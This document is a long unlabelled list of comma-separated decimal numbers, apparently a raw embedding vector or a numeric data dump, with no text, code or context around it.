-0.02489604614675045, -0.011457583867013454, -0.013468476012349129, 0.0203190166503191, -0.02013893611729145, -0.01358102634549141, -0.020018883049488068, 0.013903669081628323, 0.01056468766182661, 0.020949294790625572, -0.022029774263501167, -0.01991383545100689, 0.023380374535918236, -0.00551119539886713, -0.03265449032187462, 0.004809634294360876, -0.02075420878827572, -0.020123928785324097, -0.007953529246151447, 0.013408449478447437, -0.006025173235684633, 0.06512890011072159, 0.0033596158027648926, 0.04126831144094467, -0.0018204952357336879, -0.03631611540913582, -0.008223649114370346, -0.021219415590167046, -0.01650732383131981, -0.009311631321907043, 0.03793683275580406, -0.01331090647727251, -0.012275447137653828, -0.03580588847398758, 0.005811328534036875, 0.025691399350762367, -0.020994314923882484, -0.004471984226256609, 0.01228294987231493, 0.009806851856410503, 0.033734969794750214, -0.049521975219249725, 0.019973862916231155, 0.0028212517499923706, -0.010001937858760357, -0.03211424872279167, -0.01899842917919159, -0.03451531380414963, -0.025526326149702072, -0.008561299182474613, 0.012493043206632137, 0.008613822050392628, -0.024911053478717804, 0.0025717660319060087, 0.010369600728154182, 0.022945180535316467, -0.0311238095164299, 0.0009440126013942063, -0.03652620688080788, -0.0005627496866509318, 0.0024554645642638206, -0.002515491098165512, 0.00432942109182477, -0.0014031225582584739, -0.020078908652067184, 0.004160596057772636, -0.0021665862295776606, 0.05831587687134743, -0.021939733996987343, -0.006197750102728605, -0.02181968092918396, 0.012748156674206257, 0.007034371141344309, 0.034725409001111984, -0.006993102841079235, 0.0028118726331740618, 0.02204478159546852, 0.013903669081628323, -0.0017426481936126947, -0.003946751356124878, 0.005462423898279667, -0.003785429522395134, -0.008508775383234024, -0.008321192115545273, 0.01779789663851261, -0.016132157295942307, -0.01991383545100689, -0.0015109829837456346, 0.0333147831261158, 0.01739271730184555, -0.05474429205060005, -0.012778169475495815, -0.0035209371708333492, 0.012020333670079708, 0.015186738222837448, -0.0035115580540150404, 0.0010570315644145012, -0.005045989062637091, 0.01673242449760437, -0.01716761663556099, 0.054053984582424164, -0.012215419672429562, -0.021039335057139397, -0.010864821262657642, 0.005248578730970621, -0.00821614544838667, -0.00821614544838667, -0.018833355978131294, -0.019028443843126297, -0.019853809848427773, 0.010924847796559334, -0.04799129441380501, -0.024851026013493538, -0.026786886155605316, 0.012553069740533829, 0.002005264861509204, 0.0049259355291724205, 0.0062240115366876125, 0.020018883049488068, 0.006445359904319048, -0.02548130601644516, -0.023185286670923233, 0.025571346282958984, -0.027117032557725906, 0.02654678001999855, -0.01742273010313511, -0.012965752743184566, -0.026261651888489723, -0.0281975120306015, -0.025391265749931335, -0.011795233935117722, 0.01043713092803955, -0.04700085520744324, 0.011420067399740219, 0.008163622580468655, -0.03547574207186699, 0.022209854796528816, -0.014654002152383327, -0.019088469445705414, -0.02753721922636032, -0.00570253049954772, -0.006043931934982538, -0.019613703712821007, 0.004033039323985577, 0.02482101321220398, 0.07809465378522873, 0.0058413418009877205, 0.01797797717154026, -0.02075420878827572, 0.010444634594023228, 0.008898948319256306, 0.007698415778577328, 0.010129494592547417, -0.004892170894891024, 0.019643716514110565, 0.024445846676826477, -0.0017116969684138894, 0.00024174789723474532, 0.0007376710418611765, 0.023425394669175148, 0.008133608847856522, -0.002384182997047901, -0.007094397675246, 0.009566744789481163, 0.0007634637295268476, -0.0031720325350761414, 0.020273996517062187, 0.02840760536491871, -0.0014640871668234468, 0.011780226603150368, -0.03115382418036461, 0.011915287002921104, -0.030763650313019753, -0.01409875601530075, -0.012035340070724487, 0.004903425928205252, -0.015171731822192669, -0.011014887131750584, -0.005803825333714485, 0.015396831557154655, -0.01449643261730671, 0.020484089851379395, -0.015456858091056347, -0.005417403765022755, -0.020003875717520714, 0.010332084260880947, -0.003025717567652464, -0.01797797717154026, 0.01637226529419422, 0.004426964092999697, -0.027657272294163704, 0.025541333481669426, 0.008313688449561596, -0.00551119539886713, -0.011765220202505589, -0.004179354291409254, -0.017332689836621284, 0.024010654538869858, 0.03667627274990082, -0.0055562155321240425, 0.014781558886170387, -0.0022303645964711905, 0.00014877694775350392, -0.023350361734628677, -0.02108435519039631, -0.003822946222499013, 0.010317077860236168, -0.01412876881659031, 0.018113037571310997, -0.002147827995941043, -0.020634155720472336, -0.018398163840174675, 0.01709258370101452, -0.004123079590499401, 0.0203190166503191, 0.01285320334136486, 0.008793901652097702, 0.013941185548901558, -0.0005524326115846634, 0.009529228322207928, 0.03283457085490227, -0.018863370642066002, 0.020964302122592926, -0.04366937652230263, -0.004318166058510542, 0.028017431497573853, 0.0281975120306015, -0.007000606041401625, 0.025871479883790016, -0.008141112513840199, 0.022449960932135582, -0.021039335057139397, 0.008523781783878803, -0.007345759309828281, -0.006719231605529785, -0.012958250008523464, -0.001167705631814897, 0.012200413271784782, 0.016012104228138924, 0.004588285926729441, 0.0148265790194273, -0.008021059446036816, -0.024175727739930153, -0.011840254068374634, -0.0016582357930019498, 0.01917850971221924, 0.01036209799349308, 0.03349486365914345, -0.0040405429899692535, -0.01761781796813011, 0.014638995751738548, 0.0168374702334404, 0.01409875601530075, -0.003170156618580222, 0.008568801917135715, -0.03382501006126404, -0.019088469445705414, 0.01764783076941967, -0.01015950832515955, -0.019058456644415855, 0.010076971724629402, 0.011457583867013454, -0.0063102999702095985, -0.02317028120160103, -0.03283457085490227, -0.02479100041091442, -0.004396950826048851, 0.028242532163858414, -0.01772286370396614, -0.0022453712299466133, 0.005147283896803856, 0.000008990805326902773, -0.012110373936593533, 0.040578003972768784, 0.03262447565793991, 0.018728310242295265, 0.009049015119671822, -0.008253661915659904, 0.0022266129963099957, 0.027627257630228996, -0.018323130905628204, 0.019433623179793358, 0.003068861784413457, -0.006171488203108311, 0.00022990669822320342, -0.007405785843729973, 0.010527171194553375, 0.020814236253499985, 0.007833476178348064, -0.00147815584205091, -0.0054811821319162846, 0.001973375678062439, 0.004355682525783777, 0.012605593539774418, -0.00891395565122366, -0.006047683302313089, -0.019598696380853653, 0.00682052643969655, 0.038537099957466125, 0.002712453482672572, 0.008433742448687553, 0.012140386737883091, -0.023860586807131767, -0.0035828398540616035, 0.004813385661691427, 0.0026524269487708807, 0.021654607728123665, 0.01965872198343277, -0.006557909771800041, 0.008951472118496895, 0.023890599608421326, -0.0009233784512616694, -0.04667070880532265, -0.006415346637368202, -0.04345928505063057, 0.014346365816891193, 0.002397313714027405, -0.016612371429800987, -0.0008089526672847569, -0.0026036552153527737, 0.017482757568359375, -0.02786736562848091, 0.011547624133527279, 0.02515115961432457, -0.024625927209854126, 0.0005468050949275494, 0.03235435485839844, 0.0037422855384647846, 0.008621325716376305, 0.018758323043584824, -0.039197392761707306, -0.010624714195728302, 0.0036766312550753355, -0.047721173614263535, 0.02097930945456028, 0.022284887731075287, 0.03841704502701759, -0.0135435089468956, -0.0038904761895537376, -0.020694181323051453, -0.02408568747341633, -0.008486265316605568, -0.008478762581944466, -0.025061119347810745, 0.0057850671000778675, -0.012035340070724487, -0.018953409045934677, -0.021729642525315285, -0.009431685321033001, -0.009019001387059689, -0.018022997304797173, 0.010257051326334476, 0.018728310242295265, -0.006276534870266914, -0.0070418743416666985, -0.03016338311135769, 0.0010448385728523135, 0.011975313536822796, 0.01412876881659031, 0.0007723739836364985, 0.01932857558131218, 0.013018276542425156, -0.016972530633211136, 0.005811328534036875, 0.021264435723423958, -0.03766671195626259, 0.008966478519141674, 0.013971199281513691, 0.00005164400863577612, -0.022359920665621758, 0.005338618997484446, 0.024520879611372948, -0.009926904924213886, -0.0005763494991697371, 0.006227763369679451, -0.013108315877616405, -0.0025623869150877, 0.0004028349940199405, 0.010061964392662048, -0.011652670800685883, 0.0007231333875097334, 0.012770666740834713, 0.010714754462242126, 0.009934407658874989, -0.013505992479622364, -0.0144589152187109, -0.013701079413294792, -0.024295780807733536, -0.01398620568215847, -0.003984267823398113, -0.0002532373764552176, 0.006314051803201437, 0.019973862916231155, -0.01398620568215847, 0.02471596747636795, -0.029938284307718277, 0.015546898357570171, -0.006261528469622135, -0.0159220639616251, 0.00478712422773242, 0.03718649968504906, 0.01321336254477501, -0.0018627014942467213, 0.009281618520617485, 0.011787730269134045, -0.000536019098944962, -0.01728767156600952, -0.027177058160305023, 0.025016099214553833, -0.022945180535316467, 0.013753602281212807, -0.008253661915659904, -0.0032958374358713627, 0.006509138271212578, -0.0036034740041941404, 0.01833813637495041, 0.009304128587245941, 0.02548130601644516, -0.0037460371386259794, -0.010302071459591389, 0.0087863989174366, -0.013505992479622364, -0.009544234722852707, -0.007758442312479019, -0.0011461335234344006, -0.01731768436729908, 0.032054223120212555, 0.016162171959877014, -0.021834688261151314, 0.009536731988191605, -0.008163622580468655, -0.028677724301815033, 0.007417040877044201, -0.034875474870204926, -0.014173788949847221, -0.003410263219848275, 0.03235435485839844, -0.005653758533298969, -0.012845699675381184, 0.017662838101387024, -0.01991383545100689, -0.022524993866682053, 0.04294905811548233, -0.012860706076025963, -0.00591262336820364, 0.012905726209282875, 0.0388072207570076, 0.006685466505587101, 0.023035220801830292, 0.006989351473748684, -0.017992984503507614, -0.017302677035331726, 0.00472334586083889, 0.01709258370101452, 0.006587923038750887, 0.005293598864227533, -0.01695752516388893, -0.010812297463417053, -0.03268450126051903, 0.00958925485610962, -0.0025492561981081963, 0.005796321667730808, -0.002718080999329686, -0.010729760862886906, 0.007645892444998026, 0.01373109221458435, -0.023920614272356033, -0.017257656902074814, -0.03313470259308815, -0.012823189608752728, 0.005631248466670513, 0.00016073537699412555, 0.006617936305701733, 0.015696965157985687, -0.024295780807733536, 0.004115575924515724, 0.029518097639083862, 0.03634612634778023, -0.0120803602039814, 0.01057969406247139, -0.014676512219011784, 0.002356045413762331, 0.0168374702334404, 0.0013627922162413597, -0.013093309476971626, -0.025091134011745453, 0.026276659220457077, -0.013918675482273102, -0.011397557333111763, 0.017767883837223053, 0.008583808317780495, 0.005045989062637091, 0.005083505529910326, 0.007011861074715853, -0.030253423377871513, -0.026261651888489723, -0.012095366604626179, -0.004524507559835911, 0.001449080416932702, 0.011705193668603897, 0.0030932475347071886, 0.01248553954064846, 0.002384182997047901, 0.013520999811589718, -0.018668282777071, -0.009641777724027634, 0.005436161998659372, 0.007653396110981703, -0.0011226856149733067, 0.006662956438958645, -0.007885999046266079, -0.006576668005436659, -0.006321555003523827, -0.006404091604053974, -0.01403872948139906, -0.016012104228138924, 0.015186738222837448, 0.01706257089972496, 0.021279441192746162, -0.0020615397952497005, 0.01917850971221924, 0.007390779443085194, -0.00911654531955719, -0.019823795184493065, 0.03136391565203667, -0.0023110255133360624, -0.0073570143431425095, 0.0009369782637804747, 0.02009391598403454, -0.04228876531124115, 0.009536731988191605, -0.009604261256754398, 0.008298682048916817, 0.003147646551951766, -0.007060633040964603, 0.0019902579952031374, 0.01833813637495041, 0.01003195159137249, 0.04526008293032646, 0.002628041198477149, 0.008936464786529541, 0.013813628815114498, 0.0004928749403916299, -0.016522331163287163, 0.00023928585869725794, 0.03307467699050903, 0.015651945024728775, -0.007642141077667475, 0.011975313536822796, -0.008441245183348656, 0.005552463699132204, -0.0077509391121566296, -0.009296624921262264, 0.028752757236361504, -0.00886143185198307, 0.018022997304797173, -0.018653277307748795, 0.01584703102707863, -0.014766552485525608, -0.008028562180697918, -0.006933076307177544, -0.015516884624958038, 0.0029394293669611216, -0.020529108121991158, 0.005019727163016796, 0.0044982461258769035, 0.006171488203108311, -0.021504541859030724, -0.03544572740793228, 0.0070531293749809265, -0.0048696608282625675, 0.0008399039506912231, -0.012057850137352943, 0.01980878971517086, -0.003950502723455429, 0.00946169812232256, 0.024775993078947067, 0.011525114066898823, -0.010354594327509403, 0.031543996185064316, -0.009566744789481163, -0.01640227809548378, -0.004835895728319883, 0.002327907830476761, 0.011322523467242718, 0.003466538153588772, 0.0012990138493478298, -0.0019283556612208486, -0.0024179478641599417, -0.0004656753735616803, -0.01713760383427143, -0.011179960332810879, -0.014136272482573986, -0.0030501033179461956, 0.004231877624988556, 0.02057412825524807, -0.0021722137462347746, 0.012920732609927654, 0.023620480671525, 0.016627376899123192, 0.007559604477137327, -0.001982754794880748, 0.002588648581877351, 0.006554157938808203, -0.005815080367028713, 0.02687692642211914, -0.014211305417120457, 0.024505874142050743, 0.0026261652819812298, -0.007387027610093355, 0.009866878390312195, 0.008336198516190052, -0.007825972512364388, 0.0006307486328296363, -0.007379524409770966, 0.028272544965147972, -0.0018814598442986608, 0.011772723868489265, -0.004149341024458408, 0.0054586720652878284, -0.005094760563224554, -0.00845625251531601, -0.030073344707489014, -0.012335473671555519, 0.004340676125138998, -0.011390053667128086, -0.007458309177309275, -0.008583808317780495, -0.0019180385861545801, -0.0024723471142351627, 0.006280286703258753, -0.0005163228488527238, 0.005650007165968418, 0.011682683601975441, 0.01640227809548378, 0.008891445584595203, 0.01003195159137249, -0.006903063040226698, 0.0047158426605165005, 0.023350361734628677, 0.016867484897375107, 0.0009688673890195787, 0.0241607204079628, 0.019133489578962326, -0.008298682048916817, -0.00028794026002287865, -0.016852477565407753, 0.008448748849332333, -0.01385864894837141, 0.02207479439675808, -0.015381825156509876, -0.007848482578992844, -0.0036503698211163282, 0.006775506306439638, -0.022720081731677055, 0.006118964869529009, 0.0022059788461774588, 0.011157450266182423, 0.013370933011174202, -0.012042843736708164, 0.0006565413204953074, -0.00479462742805481, -0.007064384408295155, -0.02786736562848091, 0.013490986078977585, 0.009011498652398586, -0.0028756510000675917, -0.0016816837014630437, -0.01914849691092968, 0.013055793009698391, 0.010827303864061832, -0.00018254193128086627, -0.0016038366593420506, -0.004070556256920099, -0.008996492251753807, 0.0015531891258433461, -0.017077578231692314, -0.007068136241286993, -0.008193635381758213, -0.007503329310566187, -0.013761105947196484, 0.028842797502875328, -0.01698753796517849, 0.008283675648272038, -0.01731768436729908, 0.007788456045091152, -0.008576305583119392, 0.00193585897795856, 0.0194036103785038, 0.008291179314255714, -0.008426238782703876, -0.005151035729795694, -0.011157450266182423, -0.0009036822011694312, 0.024475859478116035, 0.00239356211386621, 0.006107709836214781, -0.011074913665652275, -0.01892339624464512, -0.007567107677459717, 0.0175727978348732, 0.00958925485610962, 0.0004947507986798882, -0.005604987032711506, 0.01808302290737629, -0.008096092380583286, 0.0007484570960514247, 0.016867484897375107, 0.015576912090182304, 0.008771391585469246, 0.012950746342539787, -0.0053273639641702175, 0.011720200069248676, -0.0019546172115951777, -0.019718749448657036, -0.011209974065423012, 0.019238537177443504, -0.011082417331635952, 0.01003195159137249, -0.015134215354919434, 0.01914849691092968, -0.000381028454285115, -0.006587923038750887, 0.0029075401835143566, -0.01728767156600952, 0.013168343342840672, 0.008973982185125351, -0.030103357508778572, -0.015164228156208992, -0.0016826215432956815, -0.012815686874091625, 0.01345346961170435, -0.026381704956293106, -0.020273996517062187, -0.006115213502198458, -0.0024704711977392435, 0.023785553872585297, -0.023380374535918236, -0.008958974853157997, -0.012005327269434929, -0.021249428391456604, -0.024806005880236626, -0.0040968176908791065, -0.0084187351167202, 0.02240494079887867, -0.01584703102707863, 0.015877045691013336, -0.0081486152485013, -0.014706525020301342, -0.021909721195697784, 0.008951472118496895, 0.03460535407066345, -0.008358708582818508, -0.014669008553028107, -0.008816411718726158, -0.0034552831202745438, -0.012493043206632137, 0.007390779443085194, 0.004280649591237307, -0.008726372383534908, 0.0034646622370928526, 0.011780226603150368, -0.0012070981319993734, -0.006276534870266914, -0.03136391565203667, 0.003218928351998329, 0.014421398751437664, -0.0006574792205356061, 0.0005097574321553111, 0.009926904924213886, -0.01229795627295971, 0.009259108453989029, -0.005436161998659372, 0.010272057726979256, 0.009169068187475204, 0.006073945201933384, 0.03268450126051903, 0.007233209442347288, 0.020439069718122482, -0.008291179314255714, 0.022269882261753082, -0.0034702897537499666, 0.009514221921563148, -0.0007897253963164985, -0.00017843855312094092, 0.0010242044227197766, -0.01805301010608673, 0.012403002940118313, 0.005740046966820955, -0.017047563567757607, 0.01917850971221924, 0.0013665438164025545, -0.020379042252898216, 0.007143169641494751, 0.011209974065423012, -0.003143894951790571, 0.02713203802704811, -0.0090640215203166, 0.015134215354919434, 0.008703862316906452, -0.014969142153859138, -0.011667677201330662, -0.00041057280031964183, 0.005286095663905144, 0.01477405522018671, 0.018773330375552177, 0.016027111560106277, -0.009251604788005352, 0.0021628346294164658, -0.010444634594023228, -0.00011712228297255933, -0.009844368323683739, 0.0018880252027884126, 0.018458189442753792, 0.008163622580468655, -0.008966478519141674, 0.022029774263501167, -0.010759774595499039, -0.012553069740533829, -0.009281618520617485, -0.014046232216060162, 0.003121384885162115, -0.011134941130876541, -0.0175727978348732, 0.01563693769276142, 0.0026036552153527737, -0.009724314324557781, -0.010182017460465431, -0.0025229945313185453, -0.006055186968296766, -0.007105652708560228, -0.009034008719027042, -0.010759774595499039, -0.006182743236422539, -0.016057124361395836, 0.010399614460766315, 0.0022828879300504923, 0.015802010893821716, -0.0015438100090250373, -0.002605531131848693, -0.0527333989739418, -0.013596032746136189, 0.01140506099909544, 0.0018814598442986608, -0.005650007165968418, 0.004359434358775616, -0.004389447625726461, -0.01797797717154026, 0.011097423732280731, -0.0012990138493478298, 0.013723589479923248, -0.006726734805852175, 0.0022359921131283045, 0.009274114854633808, -0.014563961885869503, 0.032384369522333145, -0.014466418884694576, -0.008891445584595203, -0.01411376241594553, -0.00048584057367406785, 0.022795114666223526, 0.0063965884037315845, -0.021654607728123665, 0.021324461326003075, -0.016387270763516426, -0.01988382264971733, 0.021594582125544548, -0.007458309177309275, -0.032894596457481384, 0.008133608847856522, 0.00979184452444315, -0.00887643825262785, -0.014151278883218765, -0.022765101864933968, -0.00043495860882103443, 0.02021396905183792, 0.015126711688935757, 0.029187951236963272, -0.004036791156977415, -0.000024825469154166058, -0.0034927998203784227, 0.004475736059248447, -0.029383037239313126, -0.018863370642066002, -0.009716811589896679, 0.04967204108834267, 0.014106258749961853, -0.005008472129702568, 0.0038360771723091602, -0.0037985604722052813, 0.010294567793607712, -0.004809634294360876, -0.004059301223605871, -0.03328476846218109, 0.015952078625559807, -0.007075639441609383, 0.0029694426339119673, -0.0020146439783275127, -0.0027574736159294844, 0.01637226529419422, -0.0060814484022557735, -0.009011498652398586, -0.006317803170531988, 0.002793114399537444, -0.016282225027680397, -0.002712453482672572, 0.016597364097833633, 0.013468476012349129, 0.029683170840144157, 0.017587803304195404, 0.010309574194252491, 0.01069224439561367, -0.012605593539774418, -0.004389447625726461, -0.018698297441005707, -0.010332084260880947, 0.012200413271784782, 0.026201626285910606, -0.01226794347167015, -0.0017895440105348825, -0.00701936474069953, 0.01378361601382494, -0.006178991869091988, 0.0019133490277454257, -0.0026242893654853106, 0.016717417165637016, 0.004224374424666166, 0.004228126257658005, 0.013753602281212807, 0.020844249054789543, -0.01253806333988905, 0.001840191544033587, 0.007720925845205784, 0.019973862916231155, -0.022855140268802643, -0.006692969705909491, -0.0099794277921319, 0.006599178072065115, -0.010076971724629402, 0.005496188532561064, -0.0014847213169559836, -0.0016882490599527955, 0.0012624351074919105, 0.012778169475495815, 0.004059301223605871, 0.0007676843670196831, -0.022675061598420143, -0.010849813930690289, 0.010016944259405136, 0.023815566673874855, 0.015952078625559807, 0.016897497698664665, 0.015299288555979729, 0.02207479439675808, 0.007713422644883394, -0.0190434493124485, -0.007176934275776148, -0.0311238095164299, 0.012418010272085667, 0.003995522856712341, -0.0012483664322644472, -0.00564625533297658, 0.012305459938943386, 0.028602691367268562, -0.00820113904774189, 0.012973256409168243, 0.015119208954274654, -0.010069468058645725, -0.017257656902074814, -0.0054474170319736, 0.0002935677475761622, 0.009281618520617485, -0.008066078647971153, -0.003860462922602892, -0.010774780996143818, -0.006329058203846216, -0.0007348573417402804, 0.017962969839572906, -0.00874888151884079, -0.002607407048344612, 0.0005102264112792909, -0.001098299864679575, -0.019718749448657036, -0.02064916305243969, 0.019928842782974243, -0.011209974065423012, -0.0068993112072348595, 0.015877045691013336, 0.013138329610228539, -0.00794602558016777, -0.013520999811589718, 0.009656785055994987, -0.006216508336365223, -0.017512770369648933, -0.008816411718726158, 0.01449643261730671, 0.011847756803035736, -0.020679175853729248, 0.023410387337207794, 0.01874331571161747, -0.0043144142255187035, 0.014151278883218765, -0.018788335844874382, -0.0007662774878554046, -0.0018298744689673185, 0.011862763203680515, 0.0014744042418897152, 0.01955367624759674, -0.02350042760372162, -0.004471984226256609, -0.009184075519442558, -0.01632724516093731, -0.0019696238450706005, -0.018188070505857468, -0.008306185714900494, 0.005027230829000473, -0.008238655515015125, -0.007372021209448576, 0.02016894891858101, 0.004250635858625174, -0.0021140631288290024, -0.012800679542124271, -0.02354544773697853, -0.0351455956697464, 0.013956192880868912, 0.005923878401517868, 0.00044199300464242697, -0.011960307136178017, -0.02138448879122734, -0.009236598387360573, -0.012718142941594124, 0.011532616801559925, 0.0025173670146614313, -0.000852096825838089, 0.0015334929339587688, -0.0031607775017619133, 0.01647731103003025, -0.004922184161841869, 0.03979765996336937, 0.029638150706887245, 0.006655453238636255, -0.010039454326033592, -0.0029600635170936584, 0.003961757756769657, 0.000692651083227247, 0.00610395846888423, -0.014286339282989502, -0.0008596001425758004, 0.029097910970449448, 0.01149510033428669, 0.015531891956925392, 0.005571221932768822, -0.007083142641931772, -0.0022997704800218344, 0.021609587594866753, 0.009604261256754398, 0.01090984046459198, 0.0028568925336003304, -0.007188189309090376, 0.024325793609023094, -0.0033689949195832014, -0.016717417165637016, -0.013596032746136189, -0.02563137374818325, 0.012800679542124271, 0.014031225815415382, 0.006794264540076256, -0.005548711866140366, -0.002793114399537444, 0.014616485685110092, -0.0016891870182007551, 0.010534673929214478, -0.012057850137352943, -0.00924410205334425, -0.006966841407120228, -0.0031570259016007185, 0.004156844224780798, 0.00944669172167778, 0.024010654538869858, -0.025106139481067657, 0.010624714195728302, -0.005957643501460552, -0.014781558886170387, -0.0135435089468956, -0.0016966903349384665, -0.006749244872480631, -0.0009632398723624647, 0.02006390318274498, -0.024115700274705887, -0.01274065300822258, -0.01195280347019434, 0.0055449604988098145, 0.01160765066742897, 0.01922352984547615, -0.003567832987755537, 0.028647711500525475, 0.0004619237151928246, -0.00958925485610962, -0.0037197754718363285, -0.020289001986384392, -0.023410387337207794, -0.03082367591559887, -0.0009083718177862465, 0.017602810636162758, -0.008621325716376305, -0.023815566673874855, -0.0162972304970026, -0.005004720762372017, -0.002378555480390787, -0.0015963333426043391, -0.0015785129508003592, -0.021984754130244255, -0.0296531580388546, 0.0037160238716751337, -0.002825003582984209, -0.0022059788461774588, -0.022164834663271904, 0.035535767674446106, -0.008711365051567554, -0.012815686874091625, 0.02181968092918396, -0.0057850671000778675, -0.021174395456910133, 0.008778895251452923, 0.010939854197204113, -0.00142563262488693, -0.016102144494652748, -0.027507204562425613, -0.013363429345190525, 0.0002872368204407394, -0.013963695615530014, -0.006073945201933384, -0.002643047831952572, 0.01655234396457672, -0.0195836890488863, -0.009401671588420868, -0.013273390009999275, 0.011645167134702206, 0.000328974099829793, 0.034035101532936096, 0.0028869060333818197, 0.00472334586083889, 0.008898948319256306, -0.009941911324858665, -0.02972819097340107, -0.0065278965048491955, -0.011397557333111763, -0.011487597599625587, 0.0032208040356636047, -0.015044175088405609, -0.012508049607276917, -0.009266612119972706, 0.037036433815956116, 0.004288152791559696, -0.018173063173890114, 0.023635488003492355, 0.0002614441327750683, -0.02584146521985531, -0.0075108325108885765, 0.01625221036374569, -0.005616242066025734, -0.002217233879491687, 0.009476704522967339, -0.0021459520794451237, -0.0035190614871680737, -0.0111649539321661, -0.008388722315430641, -0.00048161993618123233, -0.028857804834842682, -0.024956073611974716, -0.024325793609023094, -0.007394530810415745, -0.0263666994869709, 0.005680020432919264, 0.004952197428792715, 0.01950865611433983, 0.012102870270609856, -0.009326638653874397, 0.0014415771001949906, 0.02009391598403454, 0.013843642547726631, -0.005023478996008635, 0.014601479284465313, 0.012380493804812431, 0.004160596057772636, -0.007000606041401625, -0.011577636934816837, -0.02723708562552929, 0.018608257174491882, -0.005593731999397278, -0.008973982185125351, 0.002607407048344612, -0.023770546540617943, 0.002530497731640935, 0.005635000299662352, -0.005942636635154486, 0.017917949706315994, -0.009236598387360573, -0.02734213136136532, -0.00465956749394536, -0.021984754130244255, 0.019643716514110565, 0.015937071293592453, 0.00019918994803447276, 0.011285006999969482, -0.00012228082050569355, -0.019448628649115562, -0.008838921785354614, 0.007236961275339127, 0.0309437308460474, -0.0029169193003326654, -0.030253423377871513, 0.005803825333714485, -0.01863826997578144, 0.020664168521761894, -0.00019743134907912463, 0.0007203196291811764, -0.020859256386756897, -0.002404817147180438, -0.0009290059679187834, 0.010527171194553375, -0.0011714572319760919, -0.0006903063040226698, 0.017737871035933495, 0.007593369111418724, -0.019163502380251884, 0.0014472046168521047, 0.02878277190029621, -0.0033483607694506645, 0.02998330444097519, 0.010167011059820652, -0.004700835794210434, -0.0031495224684476852, 0.014909115619957447, 0.011097423732280731, -0.008808908984065056, 0.0014153154334053397, -0.0042581395246088505, -0.017707856371998787, 0.0007292298250831664, 0.0027781077660620213, -0.01497664488852024, 0.016942517831921577, 0.002545504365116358, -0.01925354264676571, -0.003057606751099229, -0.007916012778878212, 0.0033408573362976313, 0.015209248289465904, -0.015546898357570171, 0.01501416228711605, -0.006160233169794083, 0.015164228156208992, 0.013033282943069935, -0.013085806742310524, 0.010242044925689697, -0.00946169812232256, 0.00011829467257484794, -0.011435073800384998, 0.013626046478748322, -0.019103476777672768, -0.01081980112940073, -0.01015950832515955, -0.006066441535949707, -0.01535931508988142, 0.0011367544066160917, -0.033885035663843155, 0.023335354402661324, -0.009019001387059689, -0.013220866210758686, 0.005406148731708527, -0.014593975618481636, -0.005038485862314701, 0.00977683812379837, -0.046400588005781174, 0.015381825156509876, -0.021729642525315285, 0.0037141479551792145, 0.027402158826589584, 0.012365486472845078, -0.009956917725503445, 0.0037310305051505566, -0.009514221921563148, -0.012673122808337212, 0.012815686874091625, 0.002115938812494278, 0.01012199092656374, 0.014939128421247005, -0.020409055054187775, -0.020739201456308365, -0.0016507324762642384, 0.00013482544454745948, -0.02471596747636795, 0.016867484897375107, 0.008193635381758213, -0.04144839197397232, 0.0017951715271919966, 0.0034796688705682755, -0.005226068664342165, 0.01037710439413786, -0.0059276302345097065, -0.014871599152684212, -0.008981484919786453, 0.023995647206902504, -0.009386665187776089, -0.004351931158453226, 0.00642660167068243, 0.00341401482000947, 0.005987656768411398, -0.010204527527093887, -0.007405785843729973, 0.008208642713725567, 0.01746775023639202, -0.010684740729629993, -0.00001543165126349777, 0.006272783502936363, 0.011547624133527279, -0.022645046934485435, 0.018113037571310997, -0.0022453712299466133, 0.0325944609940052, -0.0019808788783848286, 0.0016516703180968761, -0.018803343176841736, 0.011727703735232353, -0.0014237567083910108, -0.000840372871607542, 0.010572191327810287, -0.016312237828969955, -0.008591311983764172, -0.007908509112894535, 0.003451531520113349, -0.014068742282688618, 0.004490742459893227, 0.009041511453688145, -0.0067680031061172485, -0.005496188532561064, -0.007758442312479019, 0.020033888518810272, 0.009454195387661457, -0.012920732609927654, 0.002706825966015458, 0.009656785055994987, 0.03038848377764225, 0.015381825156509876, 0.004865908995270729, -0.007173182908445597, -0.017692850902676582, 0.005477430298924446, -0.029052890837192535, 0.006047683302313089, 0.008021059446036816, -0.003958006389439106, 0.023755541071295738, -0.0009885636391118169, 0.005856348667293787, 0.003845456289127469, -0.010264554060995579, 0.0017510894685983658, -0.001843005302362144, 0.015306792221963406, 0.00853128544986248, 0.0034927998203784227, -0.005728791933506727, 0.0009318197262473404, -0.008823915384709835, -0.03349486365914345, -0.001034521497786045, -0.009311631321907043, 0.0015541270840913057, -0.013408449478447437, -0.0007137542124837637, 0.008058575913310051, 0.009881884790956974, 0.027582239359617233, 0.01767784357070923, -0.013348422944545746, 0.009086531586945057, 0.017047563567757607, 0.010227037593722343, -0.002945056650787592, 0.016687404364347458, 0.014323855750262737, 0.014068742282688618, 0.007492074277251959, 0.008501271717250347, 0.0026467994321137667, 0.009754328057169914, -0.020409055054187775, -0.00785598624497652, 0.004066804423928261, -0.0051247738301754, -0.017332689836621284, 0.007908509112894535, 0.016132157295942307, 0.00042792424210347235, 0.002575517864897847, -0.003622232237830758, -0.027447178959846497, 0.008373715914785862, 0.005597483832389116, 0.000872262055054307, 0.004003026057034731, -0.017332689836621284, 0.002346666296944022, -0.012913229875266552, 0.007758442312479019, 0.009679295122623444, -0.017227644100785255, -0.004385695792734623, 0.011555126868188381, -0.0065278965048491955, 0.00004959231591783464, 0.002828755183145404, -0.007795959245413542, 0.009626771323382854, 0.010999880731105804, 0.01728767156600952, -0.0019808788783848286, -0.0008924272260628641, 0.012890719808638096, 0.01436887588351965, 0.006152729969471693, -0.008283675648272038, -0.012095366604626179, -0.0029075401835143566, 0.019898829981684685, -0.004967203829437494, -0.012568076141178608, 0.0025342495646327734, -0.013243376277387142, 0.006640446372330189, -0.0059839049354195595, -0.0041718510910868645, 0.006175240036100149, 0.010917344130575657, 0.03979765996336937, 0.007206948008388281, -0.002538001164793968, -0.009146558120846748, 0.028137484565377235, -0.002117814728990197, -0.021954741328954697, -0.008966478519141674, -0.000460751325590536, 0.002112187212333083, -0.0014584596501663327, -0.01023454125970602, -0.01815805770456791, 0.011487597599625587, 0.008868935517966747, -0.020273996517062187, 0.015201745554804802, -0.004153092857450247, 0.004130582790821791, 0.004494494292885065, 0.015501878224313259, 0.016312237828969955, -0.014106258749961853, 0.010969866998493671, -0.010587197728455067, 0.0012042843736708164, 0.00021818274399265647, 0.005507443565875292, -0.014533949084579945, -0.0008830480510368943, -0.013866152614355087, 0.01925354264676571, -0.027147045359015465, 0.008996492251753807, 0.0166573915630579, -0.016597364097833633, -0.018398163840174675, -0.020949294790625572, -0.00952172465622425, 